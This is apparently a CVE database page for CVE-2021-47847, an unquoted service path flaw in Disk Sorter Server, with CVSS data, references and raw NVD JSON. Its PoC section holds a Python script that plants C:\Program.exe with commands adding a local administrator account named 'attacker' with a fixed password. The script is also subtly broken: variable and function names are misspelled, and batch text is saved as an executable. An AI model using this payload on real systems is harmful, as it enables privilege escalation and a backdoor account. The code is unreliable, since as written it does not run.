CVE-2021-47847

Description

Disk Sorter Server 13.6.12 contains an unquoted service path vulnerability in its binary path configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\Program Files\Disk Sorter Server\bin\disksrs.exe' to inject malicious executables and escalate privileges.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Disk Sorter Server <= 13.6.12

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2021-47847 PoC - Disk Sorter Server Unquoted Service Path
# This PoC demonstrates creating a malicious executable in the unquoted path
# NOTE: This is for educational and authorized testing purposes only

import os
import ctypes
import sys

def create_malicious_executable():
    """
    Create a malicious executable that will be placed in the unquoted path
    to achieve privilege escalation via Disk Sorter Server service
    """
    # Malicious executable path (C:\Program.exe will be searched before the full path)
    malicious_path = r'C:\Program.exe'
    
    # Create a simple reverse shell or payload
    # This example creates a batch file wrapper (actual malware would be a compiled binary)
    malicious_code = '''@echo off
rem CVE-2021-47847 - Malicious payload injected via unquoted service path
rem This will execute with SYSTEM privileges when Disk Sorter service starts
net user attacker P@ssw0rd123! /add
net localgroup Administrators attacker /add
'''
    
    try:
        with open(malicious_path, 'w') as f:
            f.write(mallicious_code)
        print(f'[+] Malicious executable created at: {malicious_path}')
        print('[+] Wait for service restart or system reboot to trigger execution')
        return True
    except PermissionError:
        print('[-] Administrator privileges required to write to C:\\')
        return False
    except Exception as e:
        print(f'[-] Error: {e}')
        return False

def check_vulnerability():
    """
    Check if Disk Sorter Server is installed and verify unquoted path vulnerability
    """
    service_path = r'C:\Program Files\Disk Sorter Server\bin\disksrs.exe'
    
    if os.path.exists(service_path):
        print(f'[+] Disk Sorter Server found at: {service_path}')
        print('[+] Service path is UNQUOTED - vulnerable to path hijacking')
        print('[+] Attack vector: Create malicious executable in C:\\ or C:\\Program Files\\')
        return True
    else:
        print('[-] Disk Sorter Server not found on this system')
        return False

if __name__ == '__main__':
    if check_vulnerability():
        create_mallicious_executable()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2021-47847
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2021-47847
[3] CVE Details https://www.cvedetails.com/cve/CVE-2021-47847/
[4] VulDB https://vuldb.com/cve/CVE-2021-47847
[5] https://www.disksorter.com
[6] https://www.exploit-db.com/exploits/50013
[7] https://www.vulncheck.com/advisories/disk-sorter-server-disk-sorter-server-unquoted-service-path

Raw JSON Data

JSON

{"cve": {"id": "CVE-2021-47847", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:10.507", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Disk Sorter Server 13.6.12 contains an unquoted service path vulnerability in its binary path configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\\Program Files\\Disk Sorter Server\\bin\\disksrs.exe' to inject malicious executables and escalate privileges."}, {"lang": "es", "value": "Disk Sorter Server 13.6.12 contiene una vulnerabilidad de ruta de servicio sin comillas en la configuración de su ruta binaria que permite a atacantes locales ejecutar potencialmente código arbitrario. Los atacantes pueden explotar la ruta sin comillas en 'C:\\Program Files\\Disk Sorter Server\\bin\\disksrs.exe' para inyectar ejecutables maliciosos y escalar privilegios."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.disksorter.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/50013", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/disk-sorter-server-disk-sorter-server-unquoted-service-path", "source": "[email protected]"}]}}